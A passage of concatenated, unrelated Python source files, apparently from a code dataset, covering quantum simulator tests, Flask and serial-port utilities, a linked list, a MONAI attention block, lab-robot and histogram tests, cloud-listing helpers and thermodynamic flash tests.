engine_list = [LocalOptimizer()]
if mapper is not None:
engine_list.append(mapper)
eng = MainEngine(sim, engine_list=engine_list)
qubits = eng.allocate_qureg(6)
All(X) | qubits
All(H) | qubits
eng.flush()
bits = [0, 0, 1, 0, 1, 0]
polR, polPhi = cmath.polar(eng.backend.get_amplitude(bits, qubits))
while polPhi < 0:
polPhi += 2 * math.pi
assert polR == pytest.approx(1. / 8.)
bits = [0, 0, 0, 0, 1, 0]
polR2, polPhi2 = cmath.polar(eng.backend.get_amplitude(bits, qubits))
while polPhi2 < math.pi:
polPhi2 += 2 * math.pi
assert polR2 == pytest.approx(polR)
assert (polPhi2 - math.pi) == pytest.approx(polPhi)
bits = [0, 1, 1, 0, 1, 0]
polR3, polPhi3 = cmath.polar(eng.backend.get_amplitude(bits, qubits))
while polPhi3 < math.pi:
polPhi3 += 2 * math.pi
assert polR3 == pytest.approx(polR)
assert (polPhi3 - math.pi) == pytest.approx(polPhi)
All(H) | qubits
All(X) | qubits
Ry(2 * math.acos(0.3)) | qubits[0]
eng.flush()
bits = [0] * 6
polR, polPhi = cmath.polar(eng.backend.get_amplitude(bits, qubits))
assert polR == pytest.approx(0.3)
bits[0] = 1
polR, polPhi = cmath.polar(eng.backend.get_amplitude(bits, qubits))
assert (polR ==
pytest.approx(math.sqrt(0.91)))
All(Measure) | qubits
# raises if not all qubits are in the list:
with pytest.raises(RuntimeError):
eng.backend.get_amplitude(bits, qubits[:-1])
# doesn't just check for length:
with pytest.raises(RuntimeError):
eng.backend.get_amplitude(bits, qubits[:-1] + [qubits[0]])
extra_qubit = eng.allocate_qubit()
eng.flush()
# there is a new qubit now!
with pytest.raises(RuntimeError):
eng.backend.get_amplitude(bits, qubits)
def test_simulator_set_wavefunction(sim, mapper):
engine_list = [LocalOptimizer()]
if mapper is not None:
engine_list.append(mapper)
eng = MainEngine(sim, engine_list=engine_list)
qubits = eng.allocate_qureg(2)
wf = [0., 0., math.sqrt(0.2), math.sqrt(0.8)]
with pytest.raises(RuntimeError):
eng.backend.set_wavefunction(wf, qubits)
eng.flush()
eng.backend.set_wavefunction(wf, qubits)
assert pytest.approx(eng.backend.get_probability('1', [qubits[0]])) == .8
assert pytest.approx(eng.backend.get_probability('01', qubits)) == .2
assert pytest.approx(eng.backend.get_probability('1', [qubits[1]])) == 1.
All(Measure) | qubits
def test_simulator_set_wavefunction_always_complex(sim):
""" Checks that wavefunction is always complex """
eng = MainEngine(sim)
qubit = eng.allocate_qubit()
eng.flush()
wf = [1., 0]
eng.backend.set_wavefunction(wf, qubit)
Y | qubit
eng.flush()
amplitude = eng.backend.get_amplitude('1', qubit)
assert amplitude == pytest.approx(1j) or amplitude == pytest.approx(-1j)
def test_simulator_collapse_wavefunction(sim, mapper):
engine_list = [LocalOptimizer()]
if mapper is not None:
engine_list.append(mapper)
eng = MainEngine(sim, engine_list=engine_list)
qubits = eng.allocate_qureg(4)
# unknown qubits: raises
with pytest.raises(RuntimeError):
eng.backend.collapse_wavefunction(qubits, [0] * 4)
eng.flush()
eng.backend.collapse_wavefunction(qubits, [0] * 4)
assert pytest.approx(eng.backend.get_probability([0] * 4, qubits)) == 1.
All(H) | qubits[1:]
eng.flush()
assert pytest.approx(eng.backend.get_probability([0] * 4, qubits)) == .125
# impossible outcome: raises
with pytest.raises(RuntimeError):
eng.backend.collapse_wavefunction(qubits, [1] + [0] * 3)
eng.backend.collapse_wavefunction(qubits[:-1], [0, 1, 0])
probability = eng.backend.get_probability([0, 1, 0, 1], qubits)
assert probability == pytest.approx(.5)
eng.backend.set_wavefunction([1.] + [0.] * 15, qubits)
H | qubits[0]
CNOT | (qubits[0], qubits[1])
eng.flush()
eng.backend.collapse_wavefunction([qubits[0]], [1])
probability = eng.backend.get_probability([1, 1], qubits[0:2])
assert probability == pytest.approx(1.)
def test_simulator_no_uncompute_exception(sim):
eng = MainEngine(sim, [])
qubit = eng.allocate_qubit()
H | qubit
with pytest.raises(RuntimeError):
qubit[0].__del__()
# If you wanted to keep using the qubit, you shouldn't have deleted it.
assert qubit[0].id == -1
def test_simulator_functional_entangle(sim):
eng = MainEngine(sim, [])
qubits = eng.allocate_qureg(5)
# entangle all qubits:
H | qubits[0]
for qb in qubits[1:]:
CNOT | (qubits[0], qb)
# check the state vector:
assert .5 == pytest.approx(abs(sim.cheat()[1][0])**2, rel=tolerance, abs=tolerance)
assert .5 == pytest.approx(abs(sim.cheat()[1][31])**2, rel=tolerance, abs=tolerance)
for i in range(1, 31):
assert 0. == pytest.approx(abs(sim.cheat()[1][i]), rel=tolerance, abs=tolerance)
# unentangle all except the first 2
for qb in qubits[2:]:
CNOT | (qubits[0], qb)
# entangle using Toffolis
for qb in qubits[2:]:
Toffoli | (qubits[0], qubits[1], qb)
# check the state vector:
assert .5 == pytest.approx(abs(sim.cheat()[1][0])**2, rel=tolerance, abs=tolerance)
assert .5 == pytest.approx(abs(sim.cheat()[1][31])**2, rel=tolerance, abs=tolerance)
for i in range(1, 31):
assert 0. == pytest.approx(abs(sim.cheat()[1][i]), rel=tolerance, abs=tolerance)
# uncompute using multi-controlled NOTs
with Control(eng, qubits[0:-1]):
X | qubits[-1]
with Control(eng, qubits[0:-2]):
X | qubits[-2]
with Control(eng, qubits[0:-3]):
X | qubits[-3]
CNOT | (qubits[0], qubits[1])
H | qubits[0]
# check the state vector:
assert 1. == pytest.approx(abs(sim.cheat()[1][0])**2, rel=tolerance, abs=tolerance)
for i in range(1, 32):
assert 0. == pytest.approx(abs(sim.cheat()[1][i]), rel=tolerance, abs=tolerance)
All(Measure) | qubits
def test_simulator_convert_logical_to_mapped_qubits(sim):
mapper = BasicMapperEngine()
def receive(command_list):
pass
mapper.receive = receive
eng = MainEngine(sim, [mapper])
qubit0 = eng.allocate_qubit()
qubit1 = eng.allocate_qubit()
mapper.current_mapping = {qubit0[0].id: qubit1[0].id,
qubit1[0].id: qubit0[0].id}
assert (sim._convert_logical_to_mapped_qureg(qubit0 + qubit1) ==
qubit1 + qubit0)
def slow_implementation(angles, control_qubits, target_qubit, eng, gate_class):
"""
Assumption is that control_qubits[0] is lowest order bit
We apply angles[0] to state |0>
"""
assert len(angles) == 2**len(control_qubits)
for index in range(2**len(control_qubits)):
with Compute(eng):
for bit_pos in range(len(control_qubits)):
if not (index >> bit_pos) & 1:
X | control_qubits[bit_pos]
with Control(eng, control_qubits):
gate_class(angles[index]) | target_qubit
Uncompute(eng)
@pytest.mark.parametrize("gate_classes", [(Ry, UniformlyControlledRy),
(Rz, UniformlyControlledRz)])
def test_uniformly_controlled_r(sim, gate_classes):
n = 2
random_angles = [3.0, 0.8, 1.2, 0.7]
basis_state_index = 2
basis_state = [0] * 2**(n+1)
basis_state[basis_state_index] = 1.
correct_eng = MainEngine(backend=Simulator())
test_eng = MainEngine(backend=sim)
correct_sim = correct_eng.backend
correct_qb = correct_eng.allocate_qubit()
correct_ctrl_qureg = correct_eng.allocate_qureg(n)
correct_eng.flush()
test_sim = test_eng.backend
test_qb = test_eng.allocate_qubit()
test_ctrl_qureg = test_eng.allocate_qureg(n)
test_eng.flush()
correct_sim.set_wavefunction(basis_state, correct_qb + correct_ctrl_qureg)
test_sim.set_wavefunction(basis_state, test_qb + test_ctrl_qureg)
test_eng.flush()
correct_eng.flush()
gate_classes[1](random_angles) | (test_ctrl_qureg, test_qb)
slow_implementation(angles=random_angles,
control_qubits=correct_ctrl_qureg,
target_qubit=correct_qb,
eng=correct_eng,
gate_class=gate_classes[0])
test_eng.flush()
correct_eng.flush()
for fstate in range(2**(n+1)):
binary_state = format(fstate, '0' + str(n+1) + 'b')
test = test_sim.get_amplitude(binary_state,
test_qb + test_ctrl_qureg)
correct = correct_sim.get_amplitude(binary_state, correct_qb +
correct_ctrl_qureg)
print(test, "==", correct)
assert correct == pytest.approx(test, rel=tolerance, abs=tolerance)
All(Measure) | test_qb + test_ctrl_qureg
All(Measure) | correct_qb + correct_ctrl_qureg
test_eng.flush(deallocate_qubits=True)
correct_eng.flush(deallocate_qubits=True)
def test_qubit_operator(sim):
test_eng = MainEngine(sim)
test_qureg = test_eng.allocate_qureg(1)
test_eng.flush()
qubit_op = QubitOperator("X0 X1", 1)
with pytest.raises(Exception):
sim.get_expectation_value(qubit_op, test_qureg)
test_eng.backend.set_wavefunction([1, 0],
test_qureg)
test_eng.flush()
qubit_op = QubitOperator("X0", 1)
qubit_op | test_qureg[0]
test_eng.flush()
amplitude = test_eng.backend.get_amplitude('0', test_qureg)
assert amplitude == pytest.approx(0.)
amplitude = test_eng.backend.get_amplitude('1', test_qureg)
assert amplitude == pytest.approx(1.)
def test_get_expectation_value(sim):
num_qubits = 2
test_eng = MainEngine(sim)
test_qureg = test_eng.allocate_qureg(num_qubits)
test_eng.flush()
qubit_op = QubitOperator("X0 X1 X2", 1)
with pytest.raises(Exception):
sim.get_expectation_value(qubit_op, test_qureg)
qubit_op = QubitOperator("X0", 1)
test_eng.backend.set_wavefunction([1 / math.sqrt(2), 1 / math.sqrt(2), 0, 0],
test_qureg)
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(1, rel=tolerance, abs=tolerance))
test_eng.backend.set_wavefunction([1 / math.sqrt(2), -1 / math.sqrt(2), 0, 0],
test_qureg)
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(-1, rel=tolerance, abs=tolerance))
qubit_op = QubitOperator("Y0", 1)
test_eng.backend.set_wavefunction([1 / math.sqrt(2), 1j / math.sqrt(2), 0, 0],
test_qureg)
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(1, rel=tolerance, abs=tolerance))
test_eng.backend.set_wavefunction([1 / math.sqrt(2), -1j / math.sqrt(2), 0, 0],
test_qureg)
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(-1, rel=tolerance, abs=tolerance))
qubit_op = QubitOperator("Z0", 1)
test_eng.backend.set_wavefunction([1, 0, 0, 0],
test_qureg)
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(1, rel=tolerance, abs=tolerance))
test_eng.backend.set_wavefunction([0, 1, 0, 0],
test_qureg)
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(-1, rel=tolerance, abs=tolerance))
qubit_op = QubitOperator("Z0", 0.25)
test_eng.backend.set_wavefunction([1, 0, 0, 0],
test_qureg)
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(0.25, rel=tolerance, abs=tolerance))
test_eng.backend.set_wavefunction([0, 1, 0, 0],
test_qureg)
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(-0.25, rel=tolerance, abs=tolerance))
qubit_op = QubitOperator("Z0 Z1", 1)
test_eng.backend.set_wavefunction([1, 0, 0, 0],
test_qureg)
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(1, rel=tolerance, abs=tolerance))
X | test_qureg[0]
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(-1, rel=tolerance, abs=tolerance))
X | test_qureg[1]
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(1, rel=tolerance, abs=tolerance))
X | test_qureg[0]
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(-1, rel=tolerance, abs=tolerance))
| 1.710938 | 2 |
app/deps.py | jshwi/jss | 1 | 6823 | <reponame>jshwi/jss<filename>app/deps.py<gh_stars>1-10
"""
app.deps
========
Register dependencies that are not part of a ``Flask`` extension.
"""
from flask import Flask
from redis import Redis
from rq import Queue
def init_app(app: Flask) -> None:
"""Register application helpers that are not ``Flask-`` extensions.
As these are not ``Flask`` extensions they do not have an
``init_app`` method, and so can be attached to the app by declaring
them as instance attributes.
.. todo:: These are not declared in ``__init__`` and are a bit of a
code-smell. Using ``flask.g`` may be more appropriate...
:param app: Application factory object.
"""
app.redis = Redis.from_url(app.config["REDIS_URL"]) # type: ignore
app.task_queue = Queue("jss-tasks", connection=app.redis) # type: ignore
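# Usage sketch (hypothetical task path): once ``init_app`` has run, request
# handlers can enqueue background work on the queue attached above, e.g.
#
#     from flask import current_app
#
#     current_app.task_queue.enqueue("app.tasks.send_email", user_id)
#
# ``app.tasks.send_email`` and ``user_id`` are placeholders, not part of this
# module.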
| 1.742188 | 2 |
uncertainty/util/__init__.py | sangdon/intern2020_cocal | 0 | 6824 | from util.args import *
from util.logger import Logger
| 1.171875 | 1 |
com_reader.py | plusterm/plusterm | 2 | 6825 | # from wx.lib.pubsub import pub
from pubsub import pub
import serial
import threading
import queue
import time
class ComReaderThread(threading.Thread):
'''
Creates a thread that continously reads from the serial connection
Puts result as a tuple (timestamp, data) in a queue
'''
def __init__(self, ser, error_que):
threading.Thread.__init__(self)
self.ser = ser
self.error_que = error_que
self.alive = threading.Event()
self.alive.set()
def run(self):
while self.alive.isSet():
try:
if self.ser.in_waiting > 0:
timestamp = time.time()
data = self.ser.read(self.ser.in_waiting)
pub.sendMessage('serial.data', data=(timestamp, data))
except serial.SerialException as e:
reconnected = False
print('Serial connection lost, trying to reconnect.')
ts = time.time()
self.error_que.put((ts, str(e)))
while not reconnected and self.alive.isSet():
try:
# if ser still thinks it's open, close it before reopening
if self.ser.is_open:
self.ser.close()
self.ser.open()
except Exception as e:
# if reconnection failed, let some time pass before trying again
time.sleep(0.1)
else:
reconnected = True
print('Reconnected')
def stop(self, timeout=0.5):
self.alive.clear()
threading.Thread.join(self, timeout)
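
# --- Usage sketch (editorial addition, not part of the original module) ---
# Minimal wiring example: subscribe a listener to the 'serial.data' topic,
# start the reader, and stop it after a while. The port name '/dev/ttyUSB0'
# and the baud rate are placeholders.
if __name__ == '__main__':
    def on_data(data):
        timestamp, payload = data
        print(timestamp, payload)

    pub.subscribe(on_data, 'serial.data')
    error_que = queue.Queue()
    ser = serial.Serial('/dev/ttyUSB0', 9600, timeout=0)
    reader = ComReaderThread(ser, error_que)
    reader.start()
    time.sleep(5)  # let it read for a few seconds
    reader.stop()
    ser.close()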
| 2.875 | 3 |
docker/app/app.py | ganeshkumarsv/datadog-cloudfoundry-buildpack | 5 | 6826 | <reponame>ganeshkumarsv/datadog-cloudfoundry-buildpack
from flask import Flask
from datadog import statsd
import logging
import os
# This is a small example application
# It uses tracing and dogstatsd on a sample flask application
log = logging.getLogger("app")
app = Flask(__name__)
# The app has two routes, a basic endpoint and an exception endpoint
@app.route("/")
def hello():
statsd.increment('request.number', 1, tags=["test", "foo:bar", "my:app"])
log.info("Got a request at hello")
return "Hello World!"
@app.route("/error")
def error():
statsd.increment('request.error.number', 1, tags=["test", "foo:bar", "my:app"])
log.info("Got a request at error")
raise Exception()
# This is meant to be run directly, instead of executed through flask run
if __name__ == '__main__':
# It grabs the host and port from the environment
port = 5001
host = '0.0.0.0'
if os.environ.get('HOST'):
host = os.environ.get('HOST')
if os.environ.get('PORT'):
port = os.environ.get('PORT')
app.run(debug=True, host=host, port=port)
| 2.40625 | 2 |
Data Structure using Python/Linked_List/2linked_list1.py | shubhamsah/OpenEDU | 1 | 6827 | # Lets create a linked list that has the following elements
'''
1. FE
2. SE
3. TE
4. BE
'''
# Creating a Node class to create individual Nodes
class Node:
def __init__(self,data):
self.__data = data
self.__next = None
def get_data(self):
return self.__data
def set_data(self, data):
self.__data = data
def get_next(self):
return self.__next
def set_next(self,next_node):
self.__next = next_node
class LinkedList:
def __init__(self):
self.__head = None
self.__tail = None
def get_head(self):
return self.__head
def get_tail(self):
return self.__tail
# ADDING ELEMENT IN THE LINKED LIST
def add(self,data):
new_node = Node(data)
if(self.__head==None):
self.__head=self.__tail=new_node
else:
self.__tail.set_next(new_node)
self.__tail=new_node
number_list= LinkedList()
number_list.add("FE")
number_list.add("SE")
number_list.add("TE")
number_list.add("BE")
| 3.953125 | 4 |
monai/networks/blocks/selfattention.py | function2-llx/MONAI | 1 | 6828 | <gh_stars>1-10
# Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
import torch.nn as nn
from monai.utils import optional_import
Rearrange, _ = optional_import("einops.layers.torch", name="Rearrange")
class SABlock(nn.Module):
"""
A self-attention block, based on: "Dosovitskiy et al.,
An Image is Worth 16x16 Words: Transformers for Image Recognition at Scale <https://arxiv.org/abs/2010.11929>"
"""
def __init__(self, hidden_size: int, num_heads: int, dropout_rate: float = 0.0) -> None:
"""
Args:
hidden_size: dimension of hidden layer.
num_heads: number of attention heads.
dropout_rate: fraction of the input units to drop.
"""
super().__init__()
if not (0 <= dropout_rate <= 1):
raise ValueError("dropout_rate should be between 0 and 1.")
if hidden_size % num_heads != 0:
raise ValueError("hidden size should be divisible by num_heads.")
self.num_heads = num_heads
self.out_proj = nn.Linear(hidden_size, hidden_size)
self.qkv = nn.Linear(hidden_size, hidden_size * 3, bias=False)
self.input_rearrange = Rearrange("b h (qkv l d) -> qkv b l h d", qkv=3, l=num_heads)
self.out_rearrange = Rearrange("b h l d -> b l (h d)")
self.drop_output = nn.Dropout(dropout_rate)
self.drop_weights = nn.Dropout(dropout_rate)
self.head_dim = hidden_size // num_heads
self.scale = self.head_dim**-0.5
def forward(self, x):
output = self.input_rearrange(self.qkv(x))
q, k, v = output[0], output[1], output[2]
att_mat = (torch.einsum("blxd,blyd->blxy", q, k) * self.scale).softmax(dim=-1)
att_mat = self.drop_weights(att_mat)
x = torch.einsum("bhxy,bhyd->bhxd", att_mat, v)
x = self.out_rearrange(x)
x = self.out_proj(x)
x = self.drop_output(x)
return x
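
# --- Usage sketch (editorial addition, not part of the original module) ---
# Feeds a dummy batch of token embeddings through the block. Per the
# Rearrange patterns above, the input is (batch, sequence, hidden_size) and
# the output keeps the same shape.
if __name__ == "__main__":
    block = SABlock(hidden_size=128, num_heads=8, dropout_rate=0.1)
    tokens = torch.randn(2, 16, 128)  # (batch, seq_len, hidden_size)
    out = block(tokens)
    print(out.shape)  # torch.Size([2, 16, 128])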
| 2.171875 | 2 |
api/tests/opentrons/commands/test_protocol_commands.py | mrakitin/opentrons | 0 | 6829 | <reponame>mrakitin/opentrons
import pytest
from opentrons.commands import protocol_commands
@pytest.mark.parametrize(
argnames="seconds,"
"minutes,"
"expected_seconds,"
"expected_minutes,"
"expected_text",
argvalues=[
[10, 0, 10, 0, "Delaying for 0 minutes and 10.0 seconds"],
[10, 9, 10, 9, "Delaying for 9 minutes and 10.0 seconds"],
[100, 0, 40, 1, "Delaying for 1 minutes and 40.0 seconds"],
[105, 5.25, 0, 7, "Delaying for 7 minutes and 0.0 seconds"],
[0.5, 0, 0.5, 0, "Delaying for 0 minutes and 0.5 seconds"],
[105.5, 5.25, 0.5, 7, "Delaying for 7 minutes and 0.5 seconds"],
[0.998, 0, 0.998, 0, "Delaying for 0 minutes and 0.998 seconds"],
[0.9998, 0, 0.9998, 0, "Delaying for 0 minutes and 1.0 seconds"],
[1.0001, 0, 1.0001, 0, "Delaying for 0 minutes and 1.0 seconds"],
]
)
def test_delay(seconds,
minutes,
expected_seconds,
expected_minutes,
expected_text
):
command = protocol_commands.delay(seconds, minutes)
name = command['name']
payload = command['payload']
assert name == 'command.DELAY'
assert payload['seconds'] == expected_seconds
assert payload['minutes'] == expected_minutes
assert payload['text'] == expected_text
def test_delay_with_message():
"""It should allow a message to be appended to the delay text."""
command = protocol_commands.delay(seconds=1, minutes=1, msg="Waiting...")
assert command["payload"]["text"] == (
"Delaying for 1 minutes and 1.0 seconds. Waiting..."
)
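
# --- Shape sketch (editorial addition, not part of the original tests) ---
# For reference, the command dict asserted on above has the form:
# {
#     "name": "command.DELAY",
#     "payload": {"seconds": ..., "minutes": ...,
#                 "text": "Delaying for M minutes and S seconds[. msg]"},
# }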
| 2.578125 | 3 |
tests/test_histogram_source.py | ess-dmsc/just-bin-it | 0 | 6830 | from unittest.mock import patch
import pytest
from just_bin_it.endpoints.sources import HistogramSource
from tests.doubles.consumer import StubConsumer
TEST_MESSAGE = b"this is a byte message"
INVALID_FB = b"this is an invalid fb message"
class TestHistogramSource:
@pytest.fixture(autouse=True)
def prepare(self):
pass
def test_if_no_consumer_supplied_then_raises(self):
with pytest.raises(Exception):
HistogramSource(None)
def test_if_no_new_messages_then_no_data(self):
mock_consumer = StubConsumer(["broker1"], ["topic1"])
mock_consumer.add_messages([])
hs = HistogramSource(mock_consumer)
data = hs.get_new_data()
assert len(data) == 0
@patch("just_bin_it.endpoints.sources.deserialise_hs00", return_value=TEST_MESSAGE)
def test_if_five_new_messages_on_one_topic_then_data_has_five_items(
self, mock_method
):
mock_consumer = StubConsumer(["broker1"], ["topic1"])
mock_consumer.add_messages([TEST_MESSAGE] * 5)
hs = HistogramSource(mock_consumer)
data = hs.get_new_data()
_, _, message = data[0]
assert len(data) == 5
assert message == TEST_MESSAGE
def test_deserialising_invalid_fb_does_not_throw(self):
mock_consumer = StubConsumer(["broker1"], ["topic1"])
mock_consumer.add_messages([INVALID_FB])
hs = HistogramSource(mock_consumer)
hs.get_new_data()
| 2.484375 | 2 |
lctools/shortcuts.py | novel/lc-tools | 5 | 6831 | import getopt
import sys
from libcloud.compute.types import NodeState
from lc import get_lc
from printer import Printer
def lister_main(what, resource=None,
extension=False, supports_location=False, **kwargs):
"""Shortcut for main() routine for lister
tools, e.g. lc-SOMETHING-list
@param what: what we are listing, e.g. 'nodes'
@param extension: is it an extension of core libcloud functionality?
@param kwargs: additional arguments for the call
@type what: C{string}
@param supports_location: tells that objects we
listing could be filtered by location
@type supports_location: C{bool}
"""
list_method = "%slist_%s" % ({True: 'ex_', False: ''}[extension], what)
profile = "default"
format = location = None
options = "f:p:"
if supports_location:
options += "l:"
try:
opts, args = getopt.getopt(sys.argv[1:], options)
except getopt.GetoptError, err:
sys.stderr.write("%s\n" % str(err))
sys.exit(1)
for o, a in opts:
if o == "-f":
format = a
if o == "-p":
profile = a
if o == "-l":
location = a
try:
conn = get_lc(profile, resource=resource)
list_kwargs = kwargs
if supports_location and location is not None:
nodelocation = filter(lambda loc: str(loc.id) == location,
conn.list_locations())[0]
list_kwargs["location"] = nodelocation
for node in getattr(conn, list_method)(**list_kwargs):
Printer.do(node, format)
except Exception, err:
sys.stderr.write("Error: %s\n" % str(err))
def save_image_main():
"""Shortcut for main() routine for provider
specific image save tools.
"""
def usage(progname):
sys.stdout.write("%s -i <node_id> -n <image_name> [-p <profile>]\n\n" % progname)
profile = 'default'
name = node_id = None
try:
opts, args = getopt.getopt(sys.argv[1:], "i:n:p:")
except getopt.GetoptError, err:
sys.stderr.write("%s\n" % str(err))
sys.exit(1)
for o, a in opts:
if o == "-i":
node_id = a
if o == "-n":
name = a
if o == "-p":
profile = a
if node_id is None or name is None:
usage(sys.argv[0])
sys.exit(1)
conn = get_lc(profile)
node = get_node_or_fail(conn, node_id, print_error_and_exit,
("Error: cannot find node with id '%s'." % node_id,))
Printer.do(conn.ex_save_image(node, name))
def get_node_or_fail(conn, node_id, coroutine=None, cargs=(), ckwargs={}):
"""Shortcut to get a single node by its id. In case when
such node could not be found, coroutine could be called
to handle such case. Typically coroutine will output an
error message and exit from application.
@param conn: libcloud connection handle
@param node_id: id of the node to search for
@param coroutine: a callable object to handle case
when node cannot be found
@param cargs: positional arguments for coroutine
@param ckwargs: keyword arguments for coroutine
@return: node object if found, None otherwise"""
try:
node = [node for node in conn.list_nodes()
if str(node.id) == str(node_id)][0]
return node
except IndexError:
if callable(coroutine):
coroutine(*cargs, **ckwargs)
return None
def print_error_and_exit(message):
sys.stderr.write("%s\n" % message)
sys.exit(1)
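
# --- Usage sketch (editorial addition, not part of the original module) ---
# A hypothetical lister tool built on these shortcuts would be little more
# than:
#
#     from lctools.shortcuts import lister_main
#
#     if __name__ == "__main__":
#         lister_main("nodes", supports_location=True)
#
# and get_node_or_fail() is typically paired with print_error_and_exit:
#
#     node = get_node_or_fail(conn, node_id, print_error_and_exit,
#                             ("Error: cannot find node with id '%s'." % node_id,))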
| 2.578125 | 3 |
tests/test_flash_vl.py | andr1976/thermo | 380 | 6832 | <reponame>andr1976/thermo
# -*- coding: utf-8 -*-
'''Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2020, <NAME> <<EMAIL>>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.'''
import pytest
from fluids.core import C2K
import thermo
from chemicals.utils import *
from thermo import *
from fluids.numerics import *
from math import *
import json
import os
import numpy as np
def test_C2_C5_PR():
T, P = 300, 3e6
constants = ChemicalConstantsPackage(Tcs=[305.32, 469.7], Pcs=[4872000.0, 3370000.0],
omegas=[0.098, 0.251], Tms=[90.3, 143.15],
Tbs=[184.55, 309.21], CASs=['74-84-0', '109-66-0'],
names=['ethane', 'pentane'], MWs=[30.06904, 72.14878])
HeatCapacityGases = [HeatCapacityGas(poly_fit=(50.0, 1000.0, [7.115386645067898e-21, -3.2034776773408394e-17, 5.957592282542187e-14, -5.91169369931607e-11, 3.391209091071677e-08, -1.158730780040934e-05, 0.002409311277400987, -0.18906638711444712, 37.94602410497228])),
HeatCapacityGas(poly_fit=(200.0, 1000.0, [7.537198394065234e-22, -4.946850205122326e-18, 1.4223747507170372e-14, -2.3451318313798008e-11, 2.4271676873997662e-08, -1.6055220805830093e-05, 0.006379734000450042, -1.0360272314628292, 141.84695243411866]))]
correlations = PropertyCorrelationsPackage(constants, HeatCapacityGases=HeatCapacityGases)
zs = ws_to_zs(MWs=constants.MWs, ws=[.5, .5])
eos_kwargs = {'Pcs': constants.Pcs, 'Tcs': constants.Tcs, 'omegas': constants.omegas}
gas = CEOSGas(PRMIX, eos_kwargs, HeatCapacityGases=HeatCapacityGases, T=T, P=P, zs=zs)
liq = CEOSLiquid(PRMIX, eos_kwargs, HeatCapacityGases=HeatCapacityGases, T=T, P=P, zs=zs)
flasher = FlashVL(constants, correlations, liquid=liq, gas=gas)
# Check that there are two phases near the dew point; don't bother checking the composition most of the time.
# When this test was written, the case was still valid for a dP of 0.00000001 Pa.
# The issue here was that (sum_criteria < 1e-7) was the check used when interpreting the stability test result;
# it was fixed by decreasing the tolerance 10x (to 1e-8).
res = flasher.flash(P=5475649.470049857+15, T=123.3+273.15, zs=zs)
assert_close1d(res.betas, [0.9999995457838572, 4.5421614280893863e-07], rtol=1e-4)
assert_close1d(res.gas.zs, [0.7058337751720506, 0.29416622482794935], rtol=1e-4)
assert_close1d(res.liquid0.zs, [0.49517964670906095, 0.504820353290939], rtol=1e-4)
# # In this case, the tolerance had to be decreased 10x more - to 1e-9! Triggered at a dP of 0.5
res = flasher.flash(P=5475649.470049857+0.5, T=123.3+273.15, zs=zs)
assert_close1d(res.betas, [0.999999984859061, 1.5140938947055815e-08], rtol=1e-4)
assert_close1d(res.gas.zs, [0.7058336826506021, 0.29416631734939785])
assert_close1d(res.liquid0.zs, [0.4951780663825745, 0.5048219336174254])
# # This one is too close to the border - the VF from SS is less than 0,
# # but if the tolerance is increased, it is positive (and should be)
res = flasher.flash(P=5475649.470049857+0.001, T=123.3+273.15, zs=zs)
assert_close1d(res.betas, [0.9999999999697144, 3.028555184414472e-11], rtol=3e-3)
assert_close1d(res.gas.zs, [0.7058336794959247, 0.29416632050407526])
assert_close1d(res.liquid0.zs, [0.49517801199759515, 0.5048219880024049])
# This one is presently identified as a LL... just check the number of phases
assert flasher.flash(zs=zs, P=6.615e6, T=386).phase_count == 2
def test_flash_TP_K_composition_idependent_unhappiness():
constants = ChemicalConstantsPackage(Tcs=[508.1, 536.2, 512.5], Pcs=[4700000.0, 5330000.0, 8084000.0], omegas=[0.309, 0.21600000000000003, 0.5589999999999999],
MWs=[58.07914, 119.37764000000001, 32.04186], CASs=['67-64-1', '67-66-3', '67-56-1'], names=['acetone', 'chloroform', 'methanol'])
HeatCapacityGases = [HeatCapacityGas(poly_fit=(200.0, 1000.0, [-1.3320002425347943e-21, 6.4063345232664645e-18, -1.251025808150141e-14, 1.2265314167534311e-11, -5.535306305509636e-09, -4.32538332013644e-08, 0.0010438724775716248, -0.19650919978971002, 63.84239495676709])),
HeatCapacityGas(poly_fit=(200.0, 1000.0, [1.5389278550737367e-21, -8.289631533963465e-18, 1.9149760160518977e-14, -2.470836671137373e-11, 1.9355882067011222e-08, -9.265600540761629e-06, 0.0024825718663005762, -0.21617464276832307, 48.149539665907696])),
